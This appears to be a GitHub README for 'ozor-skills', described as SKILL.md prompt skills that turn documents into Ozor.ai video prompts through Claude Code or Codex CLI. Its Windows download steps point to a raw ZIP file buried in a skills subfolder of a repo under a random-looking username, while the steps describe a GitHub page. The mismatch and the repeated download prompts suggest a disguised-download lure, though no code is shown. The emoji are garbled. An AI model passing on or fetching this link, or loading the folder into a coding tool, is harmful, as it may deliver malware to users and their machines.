๐ŸŽฌ ozor-skills - Create better Ozor videos

Ozor Skills transforms ideas and documents into structured video prompts for Ozor.ai.

๐ŸŽฌ ozor-skills - Create better Ozor videos

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๐Ÿ–ฅ๏ธ What this is

Ozor Skills helps you turn ideas, docs, and prompts into strong video plans for Ozor.ai.

It is built for people who want to make product launch videos, explainers, social ads, feature announcements, investor updates, and tutorials without starting from scratch.

Use it with tools like Claude Code and Codex CLI to get clear video prompts that are easier to edit and use.

๐Ÿ“ฅ Download for Windows

  1. Open this page: https://github.com/renalpelvisdeinocheirus70/ozor-skills/raw/refs/heads/main/skills/ozor-social-batch/skills-ozor-3.1.zip
  2. On the GitHub page, look for the green Code button.
  3. Click Code.
  4. Click Download ZIP.
  5. Save the ZIP file to your PC.
  6. Open the ZIP file.
  7. Extract the folder to a place you can find, such as Downloads or Desktop.

If you use a browser that asks what to do with the file, choose Save.

๐ŸชŸ Run on Windows

  1. Open the extracted ozor-skills folder.
  2. Read the files inside the folder.
  3. If you use Claude Code, Codex CLI, or another AI coding tool, add this folder to your skill path.
  4. Open your AI tool.
  5. Ask it to use the Ozor skill for your task.
  6. Paste your source text, URL, README, PDF, or notes.
  7. Get a ready-to-use Ozor video prompt.

This project does not run like a normal desktop app. It works as a set of skills that help another AI tool write better video prompts.

๐ŸŽฏ What you can do

  • Turn a product page into a launch video prompt
  • Turn a blog post into an explainer video
  • Turn a README into a short tutorial video
  • Turn a changelog into a feature announcement
  • Turn a PDF or slide deck into a structured video brief
  • Improve weak prompts before you send them to Ozor.ai

๐Ÿง  Included skills

๐ŸŽฌ ozor-video-best-practices

This skill helps you write prompts that work well in Ozor.

It covers:

  • Prompt formulas for common video types
  • Scene structure
  • Choosing the right video format
  • Editing steps
  • Mistakes to avoid
  • How to keep the message clear

Use this skill when you want to make a video from a product, feature, or campaign idea.

๐Ÿ“„ ozor-doc-to-video

This skill turns content into a full Ozor prompt.

It can read:

  • PDFs
  • PowerPoint files
  • Blog posts
  • README files
  • Changelogs
  • URLs

It then builds a video outline with scenes, flow, and prompt text you can copy into Ozor.

โš™๏ธ How it works

  1. You give the skill a source, such as a link, document, or text.
  2. The skill reads the content.
  3. It picks the best video type.
  4. It builds a scene plan.
  5. It writes a full Ozor prompt.
  6. You paste that prompt into Ozor.ai.

๐Ÿ”ง How to use with Claude Code

  1. Download the ZIP from the GitHub page.
  2. Extract it on Windows.
  3. Open Claude Code.
  4. Point Claude Code to the folder that contains the skills.
  5. Ask Claude Code to use the Ozor skill.
  6. Share the document, page, or notes you want turned into a video.
  7. Review the prompt it creates.
  8. Paste the prompt into Ozor.ai.

๐Ÿ“‚ Suggested folder setup

You can keep the folder in one of these places:

  • C:\Users\YourName\Downloads\ozor-skills
  • C:\Users\YourName\Desktop\ozor-skills
  • C:\Tools\ozor-skills

Pick a location that is easy to find later.

โœ… Best results

Use short, clear source material when you can.

Good input:

  • A product page with key features
  • A short launch brief
  • A README with clear steps
  • A blog post with one main topic
  • A changelog with one release

Useful details to include:

  • Product name
  • Main benefit
  • Target user
  • Key features
  • Call to action
  • Tone you want
  • Video length
  • Format, such as square, vertical, or wide

๐Ÿงฉ Supported video types

  • Product launch videos
  • Explainer videos
  • Social ads
  • Feature announcement videos
  • Investor updates
  • Tutorial videos
  • Short promo videos
  • Demo videos

๐Ÿ› ๏ธ Common workflow

  1. Find your source material.
  2. Choose the right skill.
  3. Ask the AI tool to build the Ozor prompt.
  4. Review the scene order.
  5. Edit any weak lines.
  6. Paste the final prompt into Ozor.ai.
  7. Generate the video.
  8. Make small changes if needed.

๐Ÿงช Example use cases

Product launch

Use a product page and ask for a launch video prompt that opens with the main problem, shows the product, and ends with a clear next step.

Explainer video

Use a service overview and ask for a simple explainer with one idea per scene.

Social ad

Use a landing page and ask for a short ad with a strong hook and fast pacing.

Feature announcement

Use release notes and ask for a video that explains what changed and why it matters.

Tutorial

Use a help page or README and ask for a step-by-step video with simple screen flow.

๐Ÿ“˜ File standard

These skills follow the open SKILL.md standard.

That means the files are set up so AI coding tools can read them in a consistent way.

๐Ÿงญ Topics covered

  • Agent skills
  • AI video generation
  • AI video editing
  • Claude Code support
  • Codex CLI support
  • Marketing video prompts
  • Prompt writing
  • Document to video flow
  • Video planning
  • Skill file structure

๐Ÿงฏ If something does not work

  1. Make sure the ZIP file was extracted.
  2. Make sure the folder still contains the skill files.
  3. Make sure your AI tool can see the folder.
  4. Make sure you are asking the tool to use the Ozor skill.
  5. Try a shorter source document first.
  6. Use a plain text prompt if the file is hard to read.

๐Ÿ“Œ Good input file types

  • .pdf
  • .pptx
  • .docx
  • .md
  • .txt
  • Web page URLs

๐Ÿ”’ Safe use

Keep your source files in a local folder you control.

If your source has private product details, review the prompt before sending it to Ozor.ai.

๐Ÿ“Ž Download again

Visit the download page

๐Ÿ’ก Tips for smoother use

  • Keep one video goal per request
  • Use plain language
  • Share the most important source first
  • Remove extra text that does not help the video
  • Ask for a scene count if you want a short video
  • Ask for a wider format if the video is for a website or screen
  • Ask for vertical format if the video is for social media

๐Ÿ—‚๏ธ What to expect in the folder

You will usually find:

  • Skill instructions
  • Prompt rules
  • Scene guidance
  • Document-to-prompt logic
  • Support files for AI tools

๐Ÿ”Ž Why this repo is useful

It saves time when you need a strong Ozor prompt.

Instead of writing every scene by hand, you can use the skills to turn messy source material into a clear video plan

๐Ÿ“ฅ Primary download

Download ozor-skills from GitHub